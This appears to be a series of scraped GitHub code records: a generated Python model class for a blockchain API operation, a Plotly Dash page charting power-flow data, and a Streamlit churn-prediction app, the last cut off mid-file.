`/block/transaction` endpoints) MUST have a populated status field (anything on-chain must have succeeded or failed). However, operations provided during transaction construction (often times called \\\"intent\\\" in the documentation) MUST NOT have a populated status field (operations yet to be included on-chain have not yet succeeded or failed). # noqa: E501\n\n :param status: The status of this Operation.\n :type status: str\n \"\"\"\n\n self._status = status\n\n @property\n def account(self) -> AccountIdentifier:\n \"\"\"Gets the account of this Operation.\n\n\n :return: The account of this Operation.\n :rtype: AccountIdentifier\n \"\"\"\n return self._account\n\n @account.setter\n def account(self, account: AccountIdentifier):\n \"\"\"Sets the account of this Operation.\n\n\n :param account: The account of this Operation.\n :type account: AccountIdentifier\n \"\"\"\n\n self._account = account\n\n @property\n def amount(self) -> Amount:\n \"\"\"Gets the amount of this Operation.\n\n\n :return: The amount of this Operation.\n :rtype: Amount\n \"\"\"\n return self._amount\n\n @amount.setter\n def amount(self, amount: Amount):\n \"\"\"Sets the amount of this Operation.\n\n\n :param amount: The amount of this Operation.\n :type amount: Amount\n \"\"\"\n\n self._amount = amount\n\n @property\n def coin_change(self) -> CoinChange:\n \"\"\"Gets the coin_change of this Operation.\n\n\n :return: The coin_change of this Operation.\n :rtype: CoinChange\n \"\"\"\n return self._coin_change\n\n @coin_change.setter\n def coin_change(self, coin_change: CoinChange):\n \"\"\"Sets the coin_change of this Operation.\n\n\n :param coin_change: The coin_change of this Operation.\n :type coin_change: CoinChange\n \"\"\"\n\n self._coin_change = coin_change\n\n @property\n def metadata(self) -> object:\n \"\"\"Gets the metadata of this Operation.\n\n\n :return: The metadata of this Operation.\n :rtype: object\n \"\"\"\n return self._metadata\n\n @metadata.setter\n def metadata(self, metadata: object):\n \"\"\"Sets the metadata of this Operation.\n\n\n :param metadata: The metadata of this Operation.\n :type metadata: object\n \"\"\"\n\n self._metadata = metadata\n", "repo_name": "xanimo/rosetta-api", "sub_path": "server/python-flask-server-generated/swagger_server/models/operation.py", "file_name": "operation.py", "file_ext": "py", "file_size_in_byte": 10337, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "swagger_server.models.base_model_.Model", "line_number": 16, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 21, "usage_type": "name"}, {"api_name": "swagger_server.models.account_identifier.AccountIdentifier", "line_number": 21, "usage_type": "name"}, {"api_name": "swagger_server.models.amount.Amount", "line_number": 21, "usage_type": "name"}, {"api_name": "swagger_server.models.coin_change.CoinChange", "line_number": 21, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 43, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 43, "usage_type": "name"}, {"api_name": "swagger_server.models.account_identifier.AccountIdentifier", "line_number": 46, "usage_type": "name"}, {"api_name": "swagger_server.models.amount.Amount", "line_number": 47, "usage_type": "name"}, {"api_name": "swagger_server.models.coin_change.CoinChange", "line_number": 48, "usage_type": "name"}, {"api_name": "swagger_server.util.deserialize_model", "line_number": 80, "usage_type": "call"}, {"api_name": "swagger_server.util", "line_number": 80, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 83, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 93, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 106, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 106, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 117, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 117, "usage_type": "name"}, {"api_name": "swagger_server.models.account_identifier.AccountIdentifier", "line_number": 177, "usage_type": "name"}, {"api_name": "swagger_server.models.account_identifier.AccountIdentifier", "line_number": 187, "usage_type": "name"}, {"api_name": "swagger_server.models.amount.Amount", "line_number": 198, "usage_type": "name"}, {"api_name": "swagger_server.models.amount.Amount", "line_number": 208, "usage_type": "name"}, {"api_name": "swagger_server.models.coin_change.CoinChange", "line_number": 219, "usage_type": "name"}, {"api_name": "swagger_server.models.coin_change.CoinChange", "line_number": 229, "usage_type": "name"}]}
+{"seq_id": "9855663672", "text": "import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import Input,Output,State,MATCH,ALL\nimport pandas as pd\nimport pickle as pkl\nimport os\nimport base64\nimport plotly.express as px\nimport plotly.graph_objects as go\nimport json\nfrom flask import Flask\nimport math\nfrom dash_extensions.snippets import send_data_frame\nfrom dash_extensions import Download\nfrom collections import OrderedDict\nimport time\n\nline_fig=go.Figure()\ntext_font_size='1.7vh'\nnavbar_font_size='2vh'\nheader_font_size='2vh'\n\n\n# the div where the flow line chart will be inside it\n# dcc.Graph src : https://www.youtube.com/watch?v=G8r2BB3GFVY\n\nline_div=html.Div([\n dcc.Graph(id='flow_line_chart', config={'displayModeBar': True, 'scrollZoom': True,'displaylogo': False},\n style=dict(height='45vh',backgroundColor='#20374c') ,figure=line_fig\n ) ] ,id='flow_line_div'\n )\n\n\n# dropdown menu of resolutions\n# dcc.dropdown src : https://dash.plotly.com/dash-core-components/dropdown\n# note that i added some pure css to the all dropdowns in custom css file\n\nresolution_menu= dcc.Dropdown(\n id='flow_resolution_menu',\n options=[\n dict(label='Mean Agg. Quarterly', value='Mean Agg. Quarterly'), dict(label='Sum Agg. Quarterly', value='Sum Agg. Quarterly'),\n dict(label='Mean Agg. Monthly', value='Mean Agg. Monthly'), dict(label='Sum Agg. Monthly', value='Sum Agg. Monthly'),\n dict(label='Mean Agg. Daily', value='Mean Agg. Daily'), dict(label='Sum Agg. Daily', value='Sum Agg. Daily'),\n dict(label='Hourly', value='Hourly')\n ],\n value='Mean Agg. Quarterly' , style=dict(color='#0f2537',fontWeight='bold',textAlign='center',\n width='20vh',backgroundColor='#0f2537',border='1px solid #00bfff')\n )\n\n# text apears above resolution dropdown\nresolution_text=html.Div(html.H1('Resolution',\n style=dict(fontSize=text_font_size,fontWeight='bold',color='white',marginTop='')),\n style=dict(display='inline-block',marginLeft='',textAlign=\"center\",width='100%'))\n\n# the div that contains both the text and dropdown of resolution\nresolution_menu_div= html.Div([resolution_text,resolution_menu],\n style=dict( fontSize=text_font_size,\n marginLeft='2vh',marginBottom='',display='inline-block'))\n\n# the button that is pressed on to download data as csv\n# dbc.Button src : https://dash-bootstrap-components.opensource.faculty.ai/docs/components/button/\ndownload_csv=html.Div([dbc.Button(\"Download CSV\", color=\"primary\", size='lg', n_clicks=0,id=\"flow_download_csv\"\n ,style=dict(fontSize='1.6vh')\n )],style=dict(display='inline-block',marginLeft='2vh',marginTop='3%'))\n\n# dash Download component that handles downloading process from browser to device\n# Download component src : https://dash.plotly.com/dash-core-components/download\ncsv_download_data=html.Div([Download(id=\"flow_csv_download_data\")])\n\n# the function that create the flow page layout when pressing on page from navigation bar\ndef creat_flow_layout():\n with open(\"Flow_20220208.pickle\", \"rb\") as f:\n object = pkl.load(f)\n df_marks = object['DEU_FRA'] # getting a dataframe from pickle file to be used to get years range of data to be used in years slider later\n\n countries = list(object.keys()) # get countries which are keys of pickle dictionery to be used in countries dropdown menu\n object=None\n\n # list of scenarios to be used in scenarios check boxes later\n scenarios = ['Normal','1991', '1992', '1993', '1994', '1995', '1996', '1997',\n '1998', '1999', '2000', '2001', '2002', '2003', '2004',\n '2005', '2006', '2007', '2008', '2009', '2010', '2011',\n '2012', '2013', '2014', '2015','Exp']\n\n # dropdown of countries\n country_menu = dcc.Dropdown(className=\"custom-dropdown\",\n id='flow_country_menu',\n\n options=[{'label': country, 'value': country} for country in countries] # get all countries from countries list\n ,\n value=countries[0],\n style=dict(color='#0f2537', fontWeight='bold', textAlign='center',\n width='20vh', backgroundColor='#0f2537', border='1px solid #00bfff')\n )\n\n country_text = html.Div(html.H1('Countries',\n style=dict(fontSize=text_font_size, fontWeight='bold', color='white',\n marginTop='')),\n style=dict(display='inline-block', marginLeft='', textAlign=\"center\", width='100%'))\n\n country_menu_div = html.Div([country_text, country_menu],\n style=dict(fontSize=text_font_size,\n marginLeft='', marginBottom='', display='inline-block'))\n\n scenarios_text = html.Div(html.H1('Scenarios',\n style=dict(fontSize=text_font_size, fontWeight='bold', color='white',\n marginTop='')),\n style=dict(display='inline-block', marginLeft='', textAlign=\"left\", width='100%'))\n\n # the check boxes element , src : https://dash-bootstrap-components.opensource.faculty.ai/docs/components/input/\n scenarios_list = dbc.Checklist(\n inline=True,\n options=[{'label': scenario, 'value': scenario} for scenario in scenarios] # get all scenarios from scenarios list\n ,\n value=[scenarios[0]], label_style=dict(fontSize='1.5vh'),\n id=\"flow_scenarios_list\", style=dict(fontSize='2vh', marginLeft='0', color='white')\n )\n\n bar_fig=go.Figure(go.Bar())\n\n bar_div = html.Div([\n dcc.Graph(id='flow_bar_chart', config={'displayModeBar': True, 'scrollZoom': True, 'displaylogo': False},\n style=dict(height='60vh', backgroundColor='#20374c'), figure=bar_fig\n )], id='bar_div'\n )\n\n\n\n # create new column of only years by getting the years from date column using pd.DatetimeIndex() function\n # src : https://pandas.pydata.org/docs/reference/api/pandas.DatetimeIndex.year.html\n df_marks['Year'] = (pd.DatetimeIndex(df_marks.iloc[:, 26]).year).astype(str)\n # converting years column to int type\n df_marks['Year']=df_marks['Year'].astype('int32')\n # converting years column to list\n years=df_marks['Year'].to_list()\n # removing repeated years from years list\n years=list(OrderedDict.fromkeys(years))\n # setting the slider years marks from the years list\n marks_values={year: {'label': '{}'.format(year), 'style': {'color': 'white'}} for year in years}\n # dcc.RangeSlider src : https://dash.plotly.com/dash-core-components/rangeslider\n years_slider=html.Div([dcc.RangeSlider(min=years[0], max=years[-1], step=1, value=[years[1],years[-2]], marks=marks_values ,id='flow_bar_slider')\n ])\n\n # layout to be returned\n\n layout = [dbc.Col([dbc.Card(dbc.CardBody(\n [html.Div([dbc.Spinner([line_div], size=\"lg\", color=\"primary\", type=\"border\", fullscreen=False)\n , html.Br(), html.Div([country_menu_div, resolution_menu_div, download_csv],\n style={'width': '100%', 'display': 'flex', 'align-items': 'center',\n 'justify-content': 'center'}),\n html.Br(), scenarios_text, scenarios_list, csv_download_data,\n dcc.Store(id='flow_data', data=pd.DataFrame().to_dict('records'))\n\n ], style=dict(height='75vh'))])\n , style=dict(backgroundColor='#20374c')), html.Br()\n ], xl=dict(size=6, offset=0), lg=dict(size=6, offset=0),\n md=dict(size=10, offset=1), sm=dict(size=10, offset=1), xs=dict(size=10, offset=1)),\n\n dbc.Col([dbc.Card(dbc.CardBody(\n [html.Div([dbc.Spinner([bar_div],size=\"lg\", color=\"primary\", type=\"border\", fullscreen=False ),html.Br(),years_slider\n\n ], style=dict(height='75vh'))])\n\n\n\n , style=dict(backgroundColor='#20374c',height='77vh')), html.Br()],\n\n xl=dict(size=6, offset=0), lg=dict(size=6, offset=0),\n md=dict(size=10, offset=1), sm=dict(size=10, offset=1), xs=dict(size=10, offset=1)\n\n )\n\n ]\n return layout\n\n# function used in callback in app.py that returns the flow bar figure\n# it takes input of pickle file dictionery and slider range value\ndef create_flow_bar_fig(object,years_range):\n\n countries = list(object.keys()) # get countries names\n normal_scenario_mean = [] # list that will be filled with top 5 countries with normal scenario mean\n countries_list = [] # list of top 5 country names\n normal_df = pd.DataFrame() # the new dataframe that will be filled with the previos values to be used in bar figure\n\n # looping through all countries names\n for country in countries:\n\n df = object[country] # get the dataframe of the related country\n\n df=df[(df['Date'].dt.year>=years_range[0]) & (df['Date'].dt.year<=years_range[1])] # get the data only in between the ranges of slider\n # src : https://stackoverflow.com/questions/46878156/pandas-filter-dataframe-rows-with-a-specific-year\n\n df.set_index('Date', inplace=True)\n df.columns = ['1991', '1992', '1993', '1994', '1995', '1996', '1997',\n '1998', '1999', '2000', '2001', '2002', '2003', '2004',\n '2005', '2006', '2007', '2008', '2009', '2010', '2011',\n '2012', '2013', '2014', '2015', 'Normal']\n mean_power = df['Normal'].mean()\n normal_scenario_mean.append(mean_power) #append the normal scenario mean power value to the list\n countries_list.append(country) # append the country name to the list\n\n object=None\n # add these lists in the new dataframe as columnbs\n normal_df['countries'] = countries_list\n normal_df['normal_scenario_mean'] = normal_scenario_mean\n # sort the values from larger to smaller\n # src : https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.sort_values.html\n normal_df.sort_values(by='normal_scenario_mean', inplace=True, ascending=False)\n # get the top 5 values with relevent countries\n # src : https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.nlargest.html\n normal_df = normal_df.nlargest(5, 'normal_scenario_mean')\n # print(normal_df)\n normal_df['normal_scenario_mean'] = normal_df['normal_scenario_mean'].astype('int64') # convert values from float to int\n\n # create horizontal bar chart of top 5\n # src : https://plotly.com/python/horizontal-bar-charts/\n bar_fig = go.Figure(data=[\n go.Bar(name='mean power', x=normal_df['normal_scenario_mean'], y=normal_df['countries'].to_list(),\n marker_color='#00bfff', text=normal_df['normal_scenario_mean'],\n textposition='outside', textfont=dict(\n size=15,\n color=\"white\"\n ), orientation='h')\n ])\n\n bar_fig.update_layout(\n title='Top 5 countries of mean power for normal scenario', xaxis_title='MWh/h',\n yaxis_title='Interconnection with neighbouring countries',\n font=dict(size=14, family='Arial', color='white'), hoverlabel=dict(\n font_size=14, font_family=\"Rockwell\", font_color='white', bgcolor='#20374c'), plot_bgcolor='#20374c',\n paper_bgcolor='#20374c' ,margin=dict(l=0, r=10, t=40, b=0)\n\n )\n # ,categoryorder='category descending'\n bar_fig.update_xaxes(showgrid=False, showline=True, zeroline=False)\n bar_fig.update_yaxes(showgrid=False, showline=True, zeroline=False, autorange=\"reversed\")\n\n return bar_fig\n", "repo_name": "rodiscience/ML-model-dashboard", "sub_path": "assets/Final/flow_page.py", "file_name": "flow_page.py", "file_ext": "py", "file_size_in_byte": 12185, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "53", "api": [{"api_name": "plotly.graph_objects.Figure", "line_number": 20, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 20, "usage_type": "name"}, {"api_name": "dash_html_components.Div", "line_number": 29, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 30, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 40, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 53, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 53, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 58, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 64, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Button", "line_number": 64, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 70, "usage_type": "call"}, {"api_name": "dash_extensions.Download", "line_number": 70, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 75, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 88, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 98, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 98, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 103, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 107, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 107, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Checklist", "line_number": 113, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 121, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 121, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Bar", "line_number": 121, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 123, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 124, "usage_type": "call"}, {"api_name": "pandas.DatetimeIndex", "line_number": 133, "usage_type": "call"}, {"api_name": "collections.OrderedDict.fromkeys", "line_number": 139, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 139, "usage_type": "name"}, {"api_name": "dash_html_components.Div", "line_number": 143, "usage_type": "call"}, {"api_name": "dash_core_components.RangeSlider", "line_number": 143, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 148, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 148, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 148, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 149, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Spinner", "line_number": 149, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 150, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 150, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 153, "usage_type": "call"}, {"api_name": "dash_core_components.Store", "line_number": 154, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 154, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 157, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 161, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 161, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 161, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 162, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Spinner", "line_number": 162, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 162, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 168, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 185, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 219, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 219, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Bar", "line_number": 220, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 220, "usage_type": "name"}]}
+{"seq_id": "9268974671", "text": "import plotly.graph_objects as go\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score\nfrom sklearn.svm import SVC\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import cross_validate\nimport base64\nfrom pathlib import Path\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nimport plotly.figure_factory as ff\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import learning_curve\nfrom sklearn.metrics import confusion_matrix, classification_report\nimport pickle\nfrom sklearn.model_selection import train_test_split\nimport time\nimport streamlit as st\nimport numpy as np\nimport pandas as pd\nimport plotly.express as px\nimport os\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib\nmatplotlib.use('Agg')\n\n# --------------------------------------------\n\n\n@st.cache\ndef load_data(uploaded):\n return pd.read_csv(uploaded)\n\n\ndef download_link(object_to_download, download_filename, download_link_text):\n \"\"\"\n Generates a link to download the given object_to_download.\n\n object_to_download (str, pd.DataFrame): The object to be downloaded.\n download_filename (str): filename and extension of file. e.g. mydata.csv, some_txt_output.txt\n download_link_text (str): Text to display for download link.\n\n Examples:\n download_link(YOUR_DF, 'YOUR_DF.csv', 'Click here to download data!')\n download_link(YOUR_STRING, 'YOUR_STRING.txt', 'Click here to download your text!')\n\n \"\"\"\n if isinstance(object_to_download, pd.DataFrame):\n object_to_download = object_to_download.to_csv(index=False)\n\n # some strings <-> bytes conversions necessary here\n b64 = base64.b64encode(object_to_download.encode()).decode()\n\n return f'{download_link_text} '\n\n\ndef customized_plot(type_of_plot, columns, data, target, bins=0):\n\n if type_of_plot == \"Scatter\":\n if len(columns) > 1 and len(columns) <= 2:\n fig = px.scatter(\n data, x=columns[0], y=columns[1], width=620, height=420, title=\"Evolution of \"+columns[0]+\" according to \" + columns[1])\n\n fig.update_layout(title_x=0.5, font_size=15)\n st.plotly_chart(fig)\n else:\n st.sidebar.error('Choose until 2 columns')\n\n if type_of_plot == \"Bar\":\n if len(columns) > 1 and len(columns) <= 2:\n fig = px.bar(data_frame=data, x=columns[0], y=columns[1],\n width=620, height=420, barmode=\"relative\")\n st.plotly_chart(fig)\n else:\n st.sidebar.error('Choose until 2 columns')\n\n if type_of_plot == \"Countplot\":\n fig, ax = plt.subplots()\n fig = plt.figure(figsize=(16, 9))\n ax = sns.countplot(x=columns, data=data, hue=target)\n st.pyplot(fig)\n\n fig2, ax2 = plt.subplots()\n ax2 = sns.heatmap(pd.crosstab(\n data[target], data[columns], normalize='columns'), annot=True)\n st.pyplot(fig2)\n\n if type_of_plot == \"Boxplot\":\n if len(columns) > 1:\n fig = px.box(data_frame=data, x=columns[0], y=columns[1])\n else:\n fig = px.box(data_frame=data, y=columns,\n width=620, height=420, orientation=\"v\")\n\n st.plotly_chart(fig)\n\n if type_of_plot == \"Histogram\":\n fig = px.histogram(data_frame=data, x=columns,\n nbins=int(bins), width=620, height=420, title=\"Distribution of \"+columns)\n fig.update_layout(title_x=0.5, font_size=15)\n st.plotly_chart(fig)\n\n if type_of_plot == \"Distribution\":\n if target not in columns:\n st.subheader(\"distribution curve\")\n for col in columns:\n if str(data[col].dtypes) == 'object':\n st.text(\n \"Can't display the distribution plot of a categorical variable\")\n else:\n fig, ax = plt.subplots()\n fig = plt.figure(figsize=(12, 8))\n ax = plt.axvline(x=data[col].quantile(\n q=0.25), c='C1', linestyle=':')\n ax = plt.axvline(x=data[col].quantile(\n q=0.75), c='C1', linestyle=':')\n ax = plt.axvline(x=data[col].mean(), c='C1')\n ax = plt.axvline(\n x=data[col].median(), c='C1', linestyle='--')\n\n ax = plt.hist(data[col], bins=100,\n histtype='step', density=True)\n ax = data[col].plot.density(bw_method=0.5)\n\n plt.legend()\n st.pyplot(fig)\n else:\n st.subheader(\"distribution curve between target and variable\")\n for col in columns:\n if str(data[col].dtypes) == 'object':\n st.text(\n \"Can't display the distribution plot of a categorical variable\")\n else:\n fig, ax = plt.subplots()\n fig = plt.figure(figsize=(16, 9))\n ax = sns.distplot(\n data[data[target] == 1][col], label=\"Exited\")\n ax = sns.distplot(\n data[data[target] == 0][col], label=\"Stayed\")\n plt.legend()\n st.pyplot(fig)\n\n\ndef target_info(data, target):\n st.text('Value Counts By Target/Class')\n st.write(data[target].value_counts(normalize=True))\n st.write(data.iloc[:, -1].value_counts().plot.pie())\n\n fig = go.Figure(\n data=[go.Pie(labels=['Stayed', 'Exited'], values=data[target].value_counts())])\n\n fig.update_layout(title='Statistic of '+target, title_x=0.5, font_size=20)\n st.plotly_chart(fig)\n\n return data[target].value_counts(normalize=True)\n\n\ndef core(data, features, target, model, cv, length):\n\n data = data.dropna()\n features = data.columns.to_list()\n trainset, testset = train_test_split(\n data, train_size=length, random_state=0)\n X_train, y_train = preprocessing(trainset, target)\n \"Train size\", y_train.value_counts()\n X_test, y_test = preprocessing(testset, target)\n \"Test size\", y_test.value_counts()\n\n evaluation(model, X_train, y_train, X_test, y_test, cv)\n\n predictions = model.predict(X_test)\n predictions_p = model.predict_proba(X_test)\n accuracy = accuracy_score(y_test, predictions)\n f_score = f1_score(y_test, predictions, average=\"macro\")\n p = precision_score(y_test, predictions, average=\"macro\")\n r = recall_score(y_test, predictions, average=\"macro\")\n ras = roc_auc_score(y_test, predictions_p[:, 1])\n accuracy_cv = 0\n if cv > 0:\n scores = cross_validate(model, data[features], data[target], cv=cv)\n accuracy_cv = np.mean(scores[\"test_score\"])\n return predictions, predictions_p, accuracy, f_score, p, r, ras, accuracy_cv, y_test, testset\n\n\ndef view(data, target, length, predictions, predictions_p, y_test):\n data_t = pd.DataFrame({\"actual\": y_test,\n \"predictions\": predictions,\n \"predictions_proba\": predictions_p[:, 1]})\n st.write(data_t)\n st.markdown(\"\"\"\n The column \"predictions_proba\" allows to determine the probability of success of the predicted value compared to 1. \n \"\"\",\n unsafe_allow_html=True)\n\n labels = ['actual_1', 'predictions_1', 'actual_0', 'predictions_0']\n values = [len(data_t.loc[data_t[\"actual\"] == 1, \"actual\"]), len(data_t.loc[data_t[\"predictions\"] == 1, \"predictions\"]),\n len(data_t.loc[data_t[\"actual\"] == 0, \"actual\"]), len(data_t.loc[data_t[\"predictions\"] == 0, \"predictions\"])]\n\n fig = px.bar(x=labels, y=values, width=620, height=420,\n title=\"Actual and Predicted values of 0 and 1\")\n fig.update_xaxes(title_text='values')\n fig.update_yaxes(title_text='number of values present')\n st.plotly_chart(fig)\n return data_t\n\n\ndef main_content():\n st.markdown(\"\"\"\n Churn Prediction App \n \"\"\", unsafe_allow_html=True)\n\n st.markdown(\"\"\"\n Hello :smiley:. You can see the project here--> Link and the notebook here \n \"\"\",\n unsafe_allow_html=True)\n\n st.sidebar.markdown(\"\"\"\n Navigation \n \"\"\",\n unsafe_allow_html=True)\n\n # separateur = st.sidebar.selectbox(\"Choose a separator\", [',', ';'])\n uploaded = st.sidebar.file_uploader(\"upload\", type='csv')\n\n if uploaded:\n data = load_data(uploaded)\n st.sidebar.write(data.shape)\n if data.shape[0] > 5000:\n reducer = st.sidebar.slider(\n \"Randomly reduce data size %\", min_value=0.2, max_value=0.9, value=0.5)\n reduction = data.shape[0]*reducer\n data = data.sample(int(reduction))\n st.sidebar.write(data.shape)\n st.sidebar.markdown(\"\"\"\n Frame \n \"\"\",\n unsafe_allow_html=True)\n\n if st.sidebar.button('Display Dataframe'):\n \"Raw Data\", data.head(10)\n\n if st.sidebar.button('Some Statistics'):\n st.write(data.describe())\n\n target = st.sidebar.selectbox(\n 'Choose the Target Variable : ', data.columns)\n if len(data[target].unique()) > 2:\n st.sidebar.warning(\"This variable have too much unique value\")\n good_target = False\n elif data.dtypes[target] == 'object':\n st.sidebar.write(data[target].unique())\n st.sidebar.write(\n \"This target Variable don't have numeric variable. Let's change it:\")\n input1 = st.sidebar.text_input(\n f\"Change {data[target].unique()[0]} into : \")\n input2 = st.sidebar.text_input(\n f\"Change {data[target].unique()[1]} into : \")\n if st.sidebar.button(\"submit\"):\n data[target] = data[target].map(\n {data[target].unique()[0]: int(input1), data[target].unique()[1]: int(input2)})\n st.write(data)\n target_balance = target_info(data, target)\n good_target = True\n\n try:\n data[target] = data[target].map(\n {data[target].unique()[0]: int(input1), data[target].unique()[1]: int(input2)})\n except:\n st.write(\"error !!!!\")\n\n else:\n st.sidebar.info(\"We are good to go :smiley:\")\n target_balance = target_info(data, target)\n good_target = True\n\n st.sidebar.markdown(\"\"\"\n Visualizing \n \"\"\",\n unsafe_allow_html=True)\n type_of_plot = st.sidebar.selectbox(\"Select a type of plot\", [\n \"Distribution\", \"Bar\", \"Histogram\", \"Boxplot\", \"Scatter\", \"Countplot\"])\n if type_of_plot == \"Histogram\":\n bins = st.sidebar.number_input(\"Enter bins number : \")\n selected_columns_names = st.sidebar.selectbox(\n \"Select a colomn\", data.columns.tolist())\n\n elif type_of_plot == 'Countplot':\n selected_columns_names = st.sidebar.selectbox(\n \"Select one column :\", data.select_dtypes('object').columns)\n\n else:\n selected_columns_names = st.sidebar.multiselect(\n \"Select columns\", data.columns.tolist())\n\n if st.sidebar.button('Generate Plot'):\n st.success(\n f\"Generating {type_of_plot} for {selected_columns_names}\")\n customized_plot(type_of_plot, selected_columns_names,\n data, target, bins=0)\n\n st.sidebar.markdown(\"\"\"\n Preprocessing \n \"\"\",\n unsafe_allow_html=True)\n\n # if st.sidebar.checkbox(\"Check null values\"):\n # st.write(data.isna().sum())\n # null_vals = [i for i in data.isna().sum()]\n # if np.sum(null_vals) != 0:\n # st.write(\n # f\"There is {np.sum(null_vals)} null values\")\n # choice = st.sidebar.selectbox(\"How do you want to remove NaN values?\", [\n # 'Choose an option', 'Dropna', 'Replace by Mean', 'Drop Columns with NaN'])\n # missing_val_count_by_column = (data.isnull().sum())\n # col_with_NaN = missing_val_count_by_column[missing_val_count_by_column > 0].index.to_list(\n # )\n\n # data = deal_with_NaN(data, choice, col_with_NaN)\n # else:\n # st.write(\"Hum !! You are Lucky :smiley:\")\n\n features = st.sidebar.multiselect(\n \"Features\", data.drop(target, axis=1).columns)\n\n if features:\n data = data[features + [target]]\n\n cat_variable = data.select_dtypes(\n 'object').columns.to_list()\n\n if len(cat_variable) != 0:\n for cat in cat_variable:\n if len(data[cat].unique()) > 50:\n st.sidebar.warning(\n \"Too much unique values in \"+cat+\". OneHotEncoding may take a long time !!\")\n cat_encoder = False\n st.sidebar.write(f\"{cat_variable} are categorical data\")\n choice = st.sidebar.selectbox(f\"Would you like to create dummies for them ?\", [\n 'Choose an options', 'OneHotEncoding', 'LabelEncoding'])\n\n if choice == 'OneHotEncoding':\n try:\n data = pd.get_dummies(\n data=data, columns=cat_variable, drop_first=True)\n st.write(data)\n cat_encoder = True\n except:\n st.sidebar.write('Choose only one option')\n elif choice == 'LabelEncoding':\n try:\n encoder = LabelEncoder()\n for col in cat_variable:\n data[col] = encoder.fit_transform(data[col])\n cat_encoder = True\n st.write(data)\n except:\n st.sidebar.write('Choose only one option')\n else:\n st.sidebar.warning(\"You have to choose an option\")\n else:\n cat_encoder = True\n\n st.sidebar.markdown(\"\"\"\n Modeling \n \"\"\",\n unsafe_allow_html=True)\n length = st.sidebar.slider(\n \"Train size\", min_value=0.1, max_value=0.9, value=0.8)\n\n cv = st.sidebar.selectbox(\n \"Cross Validation on the train\",\n [0, 5, 10, 15, 20])\n\n model = st.sidebar.selectbox(\n \"Which model do you like!\",\n [\"Decision 